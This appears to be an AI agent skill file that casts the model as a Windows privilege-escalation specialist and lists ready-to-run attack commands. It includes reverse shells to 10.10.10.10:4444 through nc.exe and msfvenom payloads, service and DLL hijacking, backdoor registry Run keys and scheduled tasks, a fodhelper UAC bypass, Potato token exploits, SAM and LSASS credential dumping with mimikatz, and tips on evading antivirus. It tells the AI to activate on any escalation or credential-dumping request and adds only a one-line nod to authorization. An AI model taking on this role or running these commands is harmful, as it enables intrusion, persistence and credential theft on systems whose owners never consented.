0X6C7879/windows-privilege-escalation

Windows Privilege Escalation Skill

You are a Windows security expert specializing in privilege escalation techniques. Use this skill when the user requests help with:

• Escalating privileges on Windows systems
• Exploiting Windows misconfigurations
• Service exploitation and DLL hijacking
• Token manipulation and impersonation
• Registry exploitation
• UAC bypass techniques
• Scheduled task abuse
• Windows credential dumping

Core Methodologies

1. Initial System Enumeration

System Information:

# Basic system info
systeminfo
hostname
whoami /all
ver
wmic os get Caption,CSDVersion,OSArchitecture,Version

# Users and groups
net user
net user <username>
net localgroup
net localgroup Administrators
whoami /priv
whoami /groups

PowerShell Enumeration:

# System info
Get-ComputerInfo
Get-HotFix  # Installed patches
Get-Service  # Running services

# Current user privileges
$env:username
[Security.Principal.WindowsIdentity]::GetCurrent()

Network Information:

ipconfig /all
route print
arp -a
netstat -ano
netsh firewall show state
netsh firewall show config

2. Service Exploitation

Enumerate Services:

# List services
sc query
sc query state= all
wmic service list brief
Get-Service

# Detailed service info
sc qc <service_name>
sc query <service_name>

# Service permissions
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv %USERNAME% *

Unquoted Service Paths:

# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# PowerShell
Get-WmiObject Win32_Service | Where-Object {$_.PathName -notlike '*"*' -and $_.PathName -like '* *'} | Select Name,PathName,StartMode

# Exploit: Place malicious executable in path with spaces
# Example path: C:\Program Files\My Service\service.exe
# Create: C:\Program.exe  (will execute before actual service)

Weak Service Permissions:

# Check service permissions with accesschk
accesschk.exe -uwcqv "Everyone" *
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Users" *

# Modify service binary path
sc config <service> binpath= "C:\Windows\Temp\nc.exe -nv 10.10.10.10 4444 -e cmd.exe"
sc stop <service>
sc start <service>

# Change service to run as SYSTEM
sc config <service> obj= "LocalSystem" password= ""

Service Binary Hijacking:

# If you can replace service binary
# Create malicious executable
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > evil.exe

# Replace original binary (if writable)
move C:\Path\To\Service\original.exe original.exe.bak
copy evil.exe C:\Path\To\Service\original.exe

# Restart service
sc stop <service>
sc start <service>

3. DLL Hijacking

DLL Search Order:

1. Application directory
2. System32 directory
3. System directory
4. Windows directory
5. Current directory
6. PATH directories

Find DLL Hijacking Opportunities:

# Process Monitor (procmon) - filter for NAME NOT FOUND and path contains .dll
# Look for applications loading DLLs from writable directories

# PowerShell - find writable directories in PATH
$env:PATH -split ';' | ForEach-Object { if (Test-Path $_) { icacls $_ } }

Create Malicious DLL:

# Generate DLL with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > evil.dll

# Place in writable directory that application loads from
# Wait for service/application restart

4. Registry Exploitation

Autorun Keys:

# Check autorun registry keys
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

# PowerShell
Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'

# Modify if writable
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v backdoor /t REG_SZ /d "C:\Windows\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"

AlwaysInstallElevated:

# Check if both are set to 1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If both = 1, can install MSI as SYSTEM
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi > evil.msi
msiexec /quiet /qn /i C:\Temp\evil.msi

Saved Credentials:

# Check for saved credentials
cmdkey /list

# Use saved credentials
runas /savecred /user:admin cmd.exe
runas /savecred /user:DOMAIN\Administrator "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"

5. Token Manipulation

Token Impersonation:

# Check for SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege
whoami /priv

# If enabled, use Potato exploits:
# - JuicyPotato (Windows 7-10, Server 2008-2016)
# - RoguePotato (Windows 10/Server 2019)
# - PrintSpoofer (Windows 10/Server 2016+)

JuicyPotato:

# Requires SeImpersonate or SeAssignPrimaryToken
JuicyPotato.exe -t * -p C:\Windows\System32\cmd.exe -l 1337 -a "/c C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"

# With specific CLSID
JuicyPotato.exe -t * -p cmd.exe -l 1337 -c {CLSID}

PrintSpoofer (Modern Windows):

# For Windows 10/Server 2016+
PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -c "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"

GodPotato (Latest):

# For Windows Server 2012+, Windows 8+
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"

6. UAC Bypass

Check UAC Level:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
# ConsentPromptBehaviorAdmin = 0 (no UAC)
# ConsentPromptBehaviorAdmin = 5 (default UAC)

UAC Bypass Techniques:

# fodhelper.exe bypass (Windows 10)
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"

# Cleanup
Remove-Item "HKCU:\Software\Classes\ms-settings" -Recurse -Force

# Disk Cleanup bypass (cleanmgr.exe)
# Event Viewer bypass (eventvwr.exe)
# Computer Management bypass (compmgmt.msc)

7. Scheduled Tasks

Enumerate Tasks:

# List scheduled tasks
schtasks /query /fo LIST /v
schtasks /query /fo TABLE /v

# PowerShell
Get-ScheduledTask
Get-ScheduledTask | Where-Object {$_.TaskPath -notlike "\Microsoft*"}

Exploit Writable Task Scripts:

# If task runs script you can modify
echo C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe > C:\Path\To\Task\script.bat

# Check task permissions
icacls C:\Path\To\Task\script.bat

Create Malicious Task:

# Create task to run as SYSTEM
schtasks /create /tn "Backdoor" /tr "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe" /sc onstart /ru System

# Create task to run every minute
schtasks /create /tn "Backdoor" /tr "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe" /sc minute /mo 1 /ru System

8. Kernel Exploits

Identify Windows Version:

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic os get Caption,CSDVersion,OSArchitecture,Version

Check Installed Patches:

wmic qfe list
wmic qfe get Caption,Description,HotFixID,InstalledOn

Common Windows Exploits:

# MS16-032 - Secondary Logon Handle (Windows 7-10, Server 2008-2012)
# MS17-010 - EternalBlue (Windows 7-10, Server 2008-2016)
# CVE-2021-1675 - PrintNightmare (Windows 7-11, Server 2008-2022)
# CVE-2021-36934 - HiveNightmare/SeriousSAM (Windows 10)

# Search exploits
searchsploit windows kernel | grep -i "privilege escalation"

Windows Exploit Suggester:

# On Linux
python windows-exploit-suggester.py --database 2021-09-01-mssb.xls --systeminfo systeminfo.txt

9. Credential Access

SAM/SYSTEM Dumping:

# Save registry hives (requires admin)
reg save HKLM\SAM C:\Temp\sam.hive
reg save HKLM\SYSTEM C:\Temp\system.hive
reg save HKLM\SECURITY C:\Temp\security.hive

# Extract hashes (on Linux)
samdump2 system.hive sam.hive
secretsdump.py -sam sam.hive -system system.hive LOCAL

# Volume Shadow Copy (requires admin)
vssadmin list shadows
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Temp\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\system

LSASS Dumping:

# Task Manager method (GUI)
# Find lsass.exe -> Create Dump File

# procdump (Sysinternals)
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# comsvcs.dll method
tasklist | findstr lsass
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full

# Parse dump with mimikatz (offline)
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Search for Passwords:

# Files containing password strings
findstr /si password *.txt *.xml *.ini *.config
findstr /si password C:\*.txt C:\*.xml C:\*.ini

# Unattend files
dir /s *unattend.xml
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattended.xml

# PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# IIS web.config
type C:\inetpub\wwwroot\web.config
type C:\Windows\System32\inetsrv\config\applicationHost.config

# Saved credentials in registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s

10. Group Policy Preferences (GPP)

Search for GPP Files:

# Find GPP XML files containing passwords
findstr /S /I cpassword \\<DOMAIN>\sysvol\<DOMAIN>\policies\*.xml

# Decrypt cpassword
gpp-decrypt <cpassword_value>

# PowerShell
Get-GPPPassword
Get-CachedGPPPassword

Automated Enumeration Tools

WinPEAS:

# Download and run
winPEASx64.exe
winPEASx64.exe quiet
winPEASx64.exe systeminfo

PowerUp (PowerSploit):

Import-Module .\PowerUp.ps1
Invoke-AllChecks

Seatbelt:

Seatbelt.exe -group=all
Seatbelt.exe -group=system
Seatbelt.exe -group=user

SharpUp:

SharpUp.exe audit

PrivescCheck:

Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck
Invoke-PrivescCheck -Extended

Tools to Transfer

Essential Binaries:

• winPEAS.exe - Automated enumeration
• nc.exe - Netcat for reverse shells
• accesschk.exe - Check permissions
• PsExec.exe - Execute as different user
• procdump.exe - Dump process memory
• mimikatz.exe - Credential dumping
• Rubeus.exe - Kerberos attacks
• PrintSpoofer.exe - Token impersonation
• GodPotato.exe - Token impersonation (latest)

PowerShell Modules:

• PowerUp.ps1 - Privilege escalation checks
• PowerView.ps1 - AD enumeration
• Invoke-Mimikatz.ps1 - Memory credential dumping
• PrivescCheck.ps1 - Detailed enumeration

Troubleshooting

Exploit Not Working:

• Verify Windows version matches exploit requirements
• Check architecture (x86 vs x64)
• Ensure all required patches are missing
• Check for AV/EDR blocking execution
• Try different exploit variant

Access Denied:

• Check file/registry permissions with icacls
• Verify user privileges with whoami /priv
• Ensure UAC is not blocking (run as administrator)
• Check if action requires SYSTEM level

AV/EDR Bypass:

• Obfuscate payloads and scripts
• Use in-memory execution
• Disable Windows Defender (if admin)
• Use living-off-the-land binaries (LOLBins)

Reference Links

• HackTricks Windows Privesc: https://github.com/HackTricks-wiki/hacktricks/tree/master/src/windows-hardening
• PEASS-ng (WinPEAS): https://github.com/carlospolop/PEASS-ng
• PowerSploit (PowerUp): https://github.com/PowerShellMafia/PowerSploit
• Windows Exploit Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
• PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
• LOLBAS Project: https://lolbas-project.github.io/

When to Use This Skill

Activate this skill when the user asks to:

• Escalate privileges on Windows systems
• Enumerate Windows privilege escalation vectors
• Exploit Windows service misconfigurations
• Perform token manipulation attacks
• Bypass UAC
• Dump Windows credentials
• Analyze Windows security misconfigurations
• Help with Windows penetration testing

Always ensure proper authorization before performing privilege escalation on any system.